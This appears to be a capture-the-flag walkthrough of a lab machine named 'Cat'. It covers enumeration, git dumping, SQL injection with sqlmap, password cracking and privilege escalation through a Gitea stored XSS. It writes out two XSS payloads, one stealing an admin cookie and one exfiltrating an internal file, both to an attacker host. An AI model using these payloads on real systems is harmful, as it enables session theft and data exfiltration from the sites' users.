# Cat

# 1. Enumeration

Start enumerating ports, only two are opened

![image.png](Cat%201abb9525529180ae82d4f25f2121346a/image.png)

Check web application running on it

![image.png](Cat%201abb9525529180ae82d4f25f2121346a/image%201.png)

We could self-register a new account

![image.png](Cat%201abb9525529180ae82d4f25f2121346a/image%202.png)

And we are able to upload a cat info

![image.png](Cat%201abb9525529180ae82d4f25f2121346a/image%203.png)

To have a deeper knowledge about this site, we could perform a fuzzing searching for directories or php files 

![image.png](Cat%201abb9525529180ae82d4f25f2121346a/image%204.png)

Nothing interesting in the previous dictionary try with another one

![image.png](Cat%201abb9525529180ae82d4f25f2121346a/image%205.png)

Effectively there is a repository behind it

![image.png](Cat%201abb9525529180ae82d4f25f2121346a/image%206.png)

Use git dumper for extract files in this project

![image.png](Cat%201abb9525529180ae82d4f25f2121346a/image%207.png)

Now we can check the backend to find vulnerabilities

![image.png](Cat%201abb9525529180ae82d4f25f2121346a/image%208.png)

In admin.php an admin username is disclosed

![image.png](Cat%201abb9525529180ae82d4f25f2121346a/image%209.png)

By the way, username field is not sanitized in here

![image.png](Cat%201abb9525529180ae82d4f25f2121346a/image%2010.png)

The cat name parameter is used in a sql query as it is send by the user

![image.png](Cat%201abb9525529180ae82d4f25f2121346a/image%2011.png)

Here we can build two potential vector attacks, a XSS in the username that could steal the cookie of the admin when the registered users are requested, and a SQL injection in the accept cat endpoint, which is available only as admin

# 2. User flag

So, first set a xss payload to obtain admin flag, by now just put payload in the username field

```bash
<script src=x onerror=this.src="http://ip:port/?c="+encodeURIComponent(document.cookie)></script>
```

![image.png](Cat%201abb9525529180ae82d4f25f2121346a/image%2012.png)

Now register a new cat with that account, that’s how the admin could load the payload name

![image.png](Cat%201abb9525529180ae82d4f25f2121346a/image%2013.png)

Get admin cookie

![image.png](Cat%201abb9525529180ae82d4f25f2121346a/image%2014.png)

A new endpoint is available here

![image.png](Cat%201abb9525529180ae82d4f25f2121346a/image%2015.png)

As we saw before accept_cat endpoint has sql injection, we can use sqlmap here, note that the admin cookie is needed here

![image.png](Cat%201abb9525529180ae82d4f25f2121346a/image%2016.png)

![image.png](Cat%201abb9525529180ae82d4f25f2121346a/image%2017.png)

rosa hash is crackeable

![image.png](Cat%201abb9525529180ae82d4f25f2121346a/image%2018.png)

Get access through ssh 

![image.png](Cat%201abb9525529180ae82d4f25f2121346a/image%2019.png)

Looking around we have access to logs, sometimes those files do not encrypt data

![image.png](Cat%201abb9525529180ae82d4f25f2121346a/image%2020.png)

Effectively we have axel password disclosed

![image.png](Cat%201abb9525529180ae82d4f25f2121346a/image%2021.png)

User flag was there!!

![image.png](Cat%201abb9525529180ae82d4f25f2121346a/image%2022.png)

# 3.Priv esc

The last step give us a clue about a possible privilege escalation attack, we have a mail where it is being persistent in a new management system on port 3000

![image.png](Cat%201abb9525529180ae82d4f25f2121346a/image%2023.png)

That port is open here

![image.png](Cat%201abb9525529180ae82d4f25f2121346a/image%2024.png)

Forward those ports to see what is going on

![image.png](Cat%201abb9525529180ae82d4f25f2121346a/image%2025.png)

Gitea is being used to this purpose

![image.png](Cat%201abb9525529180ae82d4f25f2121346a/image%2026.png)

As a first steps check versions, this seems to be an oldie one because right now they are on 1.23 version

![image.png](Cat%201abb9525529180ae82d4f25f2121346a/image%2027.png)

This vulnerability consist in a stored xss where someone could leverage description field in a repo to plant a javascript payload trying to retrieve the content of /administrator/Employee-management/raw/branch/main/index.php which has important information about the administrator which according to the mail seems to be jorbert

![image.png](Cat%201abb9525529180ae82d4f25f2121346a/image%2028.png)

Prepare the payload

```bash
<a href="javascript.fetch('http://localhost:3000/administrator/Employee-management/raw/branch/main/index.php').then(response => response.text()).then(data => fetch('http://ip:port/?content='+encodeURIComponent(data)))">hahaha</a>
```

![image.png](Cat%201abb9525529180ae82d4f25f2121346a/image%2029.png)

This is our malicious repo

![image.png](Cat%201abb9525529180ae82d4f25f2121346a/image%2030.png)

Now send an email to jobert as it is said in the mail

![image.png](Cat%201abb9525529180ae82d4f25f2121346a/image%2031.png)

![image.png](Cat%201abb9525529180ae82d4f25f2121346a/image%2032.png)

wait a little bit to obtain root password

![image.png](Cat%201abb9525529180ae82d4f25f2121346a/image%2033.png)

![image.png](Cat%201abb9525529180ae82d4f25f2121346a/image%2034.png)

Machine pwned!!!